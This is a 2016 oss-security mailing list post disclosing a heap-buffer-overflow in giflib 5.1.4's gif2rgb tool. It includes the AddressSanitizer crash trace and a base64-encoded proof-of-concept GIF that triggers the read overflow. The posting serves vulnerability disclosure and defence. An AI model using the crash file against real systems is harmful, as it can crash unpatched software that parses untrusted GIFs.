Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 13 Sep 2016 18:50:06 +0200
From: Solar Designer <solar@...nwall.com>
To: "vul @ 724safe" <vul@...safe.com>
Cc: oss-security@...ts.openwall.com
Subject: Re: Heapoverflow in giflib5.1.4

On Tue, Sep 13, 2016 at 11:20:08PM +0800, vul @ 724safe wrote:
> With Address Sanitizer there is aa heap overflow in giflib 5.1.4
> More details are available at:
> https://sourceforge.net/p/giflib/bugs/102/

When posting to oss-security, please include the actual detail right in
your posting (up to 200 KB including MIME overhead, but of course try to
keep it smaller than that if at all practical) - not only via external
links.  I've attached the content of the above link now.  Luckily, this
one PoC GIF file is tiny:

$ base64 poc
R0lGODdhKP9/AADZACwAHQAAKAAAAPngp5Lb5QAD4wAAAgAAOwAd

Ideally, you would also investigate and patch issues found by ASan,
rather than merely include its output, but I realize we can't actually
expect anything specific from volunteers.  So whatever we've got.

Thanks,

Alexander

#102 Heap overflow in gif2rgb.c

   Milestone: v1.0_(example)
   Status: open
   Owner: nobody
   Labels: heap overflow (1)
   Priority: 7
   Updated: 2 hours ago
   Created: 2 hours ago
   Creator: STARLAB
   Private: No

   Hello,
   There is a Heap-overflow in giflib 5.1.4. The crash output with asan is as follows:
   ./util/gif2rgb poc
   =================================================================
   ==8885==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf6200a3b at pc 0x80d317d bp 0xffce7d58 sp 0xffce7d50
   READ of size 1 at 0xf6200a3b thread T0
   #0 0x80d317c in DumpScreen2RGB /home/starlab/test-fuzzing/giflib-5.1.4/util/gif2rgb.c:294
   #1 0x80d1736 in GIF2RGB /home/starlab/test-fuzzing/giflib-5.1.4/util/gif2rgb.c:474
   #2 0x80cb9e2 in main /home/starlab/test-fuzzing/giflib-5.1.4/util/gif2rgb.c:525
   #3 0xf74b4af2 (/lib/i386-linux-gnu/libc.so.6+0x19af2)
   #4 0x80ca7f4 in _start (/home/starlab/test-fuzzing/giflib-5.1.4/util/.libs/lt-gif2rgb+0x80ca7f4)

   AddressSanitizer can not describe address in more detail (wild memory access suspected).
   SUMMARY: AddressSanitizer: heap-buffer-overflow /home/starlab/test-fuzzing/giflib-5.1.4/util/gif2rgb.c:294 DumpScreen2RGB
   Shadow bytes around the buggy address:
   0x3ec400f0: fa fa 00 00 fa fa 00 04 fa fa 00 00 fa fa 03 fa
   0x3ec40100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   0x3ec40110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   0x3ec40120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   0x3ec40130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   =>0x3ec40140: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa
   0x3ec40150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   0x3ec40160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   0x3ec40170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   0x3ec40180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   0x3ec40190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
   Shadow byte legend (one shadow byte represents 8 application bytes):
   Addressable: 00
   Partially addressable: 01 02 03 04 05 06 07
   Heap left redzone: fa
   Heap right redzone: fb
   Freed heap region: fd
   Stack left redzone: f1
   Stack mid redzone: f2
   Stack right redzone: f3
   Stack partial redzone: f4
   Stack after return: f5
   Stack use after scope: f8
   Global redzone: f9
   Global init order: f6
   Poisoned by user: f7
   ASan internal: fe
   ==8885==ABORTING

   The poc is in the attachment
   The vulnerability is found by F4B3CD@...RLAB

[ CONTENT OF TYPE application/octet-stream SKIPPED ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ